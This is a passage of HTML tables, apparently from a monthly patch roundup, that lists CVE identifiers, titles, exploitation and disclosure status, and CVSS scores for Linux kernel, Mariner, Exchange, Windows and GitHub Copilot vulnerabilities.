href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40323"><span style='font-size: undefined;'>CVE-2025-40323</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>fbcon: Set fb_display[i]-&gt;mode to NULL when the mode is released</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40307"><span style='font-size: undefined;'>CVE-2025-40307</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>exfat: validate cluster allocation bits of the allocation bitmap</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40287"><span style='font-size: undefined;'>CVE-2025-40287</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>exfat: fix improper check of dentry.stream.valid_size</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40247"><span style='font-size: undefined;'>CVE-2025-40247</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>drm/msm: Fix pgtable prealloc error path</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40289"><span style='font-size: undefined;'>CVE-2025-40289</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>drm/amdgpu: hide VRAM sysfs attributes on GPUs without VRAM</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40268"><span style='font-size: undefined;'>CVE-2025-40268</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>cifs: client: fix memory leak in smb3_fs_context_parse_param</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40303"><span style='font-size: undefined;'>CVE-2025-40303</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>btrfs: ensure no dirty metadata is written back for an fs with errors</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40264"><span style='font-size: undefined;'>CVE-2025-40264</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>be2net: pass wrb_params in case of OS2BMC</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40310"><span style='font-size: undefined;'>CVE-2025-40310</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>amd/amdkfd: resolve a race in amdgpu_amdkfd_device_fini_sw</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40311"><span style='font-size: undefined;'>CVE-2025-40311</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>accel/habanalabs: support mapping cb with vmalloc-backed coherent memory</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40219"><span style='font-size: undefined;'>CVE-2025-40219</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>PCI/IOV: Add PCI rescan-remove locking when enabling/disabling SR-IOV</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40324"><span style='font-size: undefined;'>CVE-2025-40324</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>NFSD: Fix crash in nfsd4_read_release()</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40263"><span style='font-size: undefined;'>CVE-2025-40263</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Input: cros_ec_keyb - fix an invalid memory access</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40308"><span style='font-size: undefined;'>CVE-2025-40308</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Bluetooth: bcsp: receive data only if registered</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40309"><span style='font-size: undefined;'>CVE-2025-40309</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Bluetooth: SCO: Fix UAF on sco_conn_free</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40284"><span style='font-size: undefined;'>CVE-2025-40284</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Bluetooth: MGMT: cancel mesh send timer when hdev removed</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40294"><span style='font-size: undefined;'>CVE-2025-40294</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Bluetooth: MGMT: Fix OOB access in parse_adv_monitor_pattern()</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40282"><span style='font-size: undefined;'>CVE-2025-40282</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Bluetooth: 6lowpan: reset link-local header on ipv6 recv path</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40275"><span style='font-size: undefined;'>CVE-2025-40275</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>ALSA: usb-audio: Fix NULL pointer dereference in snd_usb_mixer_controls_badd</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40288"><span style='font-size: undefined;'>CVE-2025-40288</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>drm/amdgpu: Fix NULL pointer dereference in VRAM logic for APU devices</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>4.7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40269"><span style='font-size: undefined;'>CVE-2025-40269</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>ALSA: usb-audio: Fix potential overflow of PCM transfer buffer</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>4.3</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40218"><span style='font-size: undefined;'>CVE-2025-40218</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>mm/damon/vaddr: do not repeat pte_offset_map_lock() until success</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>4.1</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-12385"><span style='font-size: undefined;'>CVE-2025-12385</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Improper validation of  tag size in Text component parser</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>N/A</span></p></td></tr></tbody></table><p></p><h3 style="direction: ltr;">Open Source Software Mariner vulnerabilities</h3><table><colgroup data-width='1249.9999999999998'><col style="width:10.046367851622875%"/><col style="width:49.30448222565688%"/><col style="width:13.755795981452861%"/><col style="width:14.219474497681611%"/><col style="width:12.673879443585784%"/></colgroup><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVE</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Title</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Exploited?</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Publicly disclosed?</strong></span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'><strong>CVSSv3 base score</strong></span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-61729"><span style='font-size: undefined;'>CVE-2025-61729</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Excessive resource consumption when printing error string for host certificate validation in crypto/x509</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-66293"><span style='font-size: undefined;'>CVE-2025-66293</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>LIBPNG has an out-of-bounds read in png_image_read_composite</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.1</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-61727"><span style='font-size: undefined;'>CVE-2025-61727</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Improper application of excluded DNS name constraints when verifying wildcard names in crypto/x509</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>6.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-65637"><span style='font-size: undefined;'>CVE-2025-65637</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>A denial-of-service vulnerability exists in github.com/sirupsen/logrus when using Entry.Writer() to log a single-line payload larger than 64KB without newline characters.</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.9</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-12084"><span style='font-size: undefined;'>CVE-2025-12084</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Quadratic complexity in node ID cache clearing</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>N/A</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-13837"><span style='font-size: undefined;'>CVE-2025-13837</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Out-of-memory when loading Plist</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>N/A</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-34297"><span style='font-size: undefined;'>CVE-2025-34297</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>KissFFT Integer Overflow Heap Buffer Overflow via kiss_fft_alloc</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>N/A</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-13836"><span style='font-size: undefined;'>CVE-2025-13836</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Excessive read buffering DoS in http.client</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>N/A</span></p></td></tr></tbody></table><h3 style="direction: ltr;">Other vulnerabilities</h3><table><colgroup data-width='1250'><col style="width:13.601236476043276%"/><col style="width:39.258114374034%"/><col style="width:13.75579598145286%"/><col style="width:17.156105100463677%"/><col style="width:16.228748068006183%"/></colgroup><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVE</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Title</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Exploited?</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Publicly disclosed?</strong></span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'><strong>CVSSv3 base score</strong></span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-64671"><span style='font-size: undefined;'>CVE-2025-64671</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>GitHub Copilot for Jetbrains Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Yes</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>8.4</span></p></td></tr></tbody></table><h3 style="direction: ltr;">Server Software ESU vulnerabilities</h3><table><colgroup data-width='1250'><col style="width:13.910355486862445%"/><col style="width:38.639876352395675%"/><col style="width:13.75579598145286%"/><col style="width:17.310664605873264%"/><col style="width:16.383307573415767%"/></colgroup><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVE</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Title</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Exploited?</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Publicly disclosed?</strong></span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'><strong>CVSSv3 base score</strong></span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-64666"><span style='font-size: undefined;'>CVE-2025-64666</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Exchange Server Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-64667"><span style='font-size: undefined;'>CVE-2025-64667</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Exchange Server Spoofing Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.3</span></p></td></tr></tbody></table><h3 style="direction: ltr;">Windows vulnerabilities</h3><table><colgroup data-width='1250'><col style="width:13.117283950617283%"/><col style="width:40.89506172839506%"/><col style="width:13.734567901234568%"/><col style="width:16.666666666666668%"/><col style="width:15.58641975308642%"/></colgroup><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVE</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Title</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Exploited?</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Publicly disclosed?</strong></span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'><strong>CVSSv3 base score</strong></span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62456"><span style='font-size: undefined;'>CVE-2025-62456</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Resilient File System (ReFS) Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>8.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-64673"><span style='font-size: undefined;'>CVE-2025-64673</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Storage VSP Driver Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59516"><span style='font-size: undefined;'>CVE-2025-59516</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Storage VSP Driver Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59517"><span style='font-size: undefined;'>CVE-2025-59517</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Storage VSP Driver Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-64661"><span style='font-size: undefined;'>CVE-2025-64661</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Shell Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62461"><span style='font-size: undefined;'>CVE-2025-62461</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Projected File System Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62462"><span style='font-size: undefined;'>CVE-2025-62462</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Projected File System Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62464"><span style='font-size: undefined;'>CVE-2025-62464</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Projected File System Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55233"><span style='font-size: undefined;'>CVE-2025-55233</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Projected File System Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62467"><span style='font-size: undefined;'>CVE-2025-62467</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Projected File System Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-64679"><span style='font-size: undefined;'>CVE-2025-64679</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows DWM Core Library Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-64680"><span style='font-size: undefined;'>CVE-2025-64680</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows DWM Core Library Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62454"><span style='font-size: undefined;'>CVE-2025-62454</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62457"><span style='font-size: undefined;'>CVE-2025-62457</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62221"><span style='font-size: undefined;'>CVE-2025-62221</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Yes</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62572"><span style='font-size: undefined;'>CVE-2025-62572</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Application Information Service Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-64658"><span style='font-size: undefined;'>CVE-2025-64658</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows File Explorer Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62565"><span style='font-size: undefined;'>CVE-2025-62565</span></a></p></td><td><p style="direction: 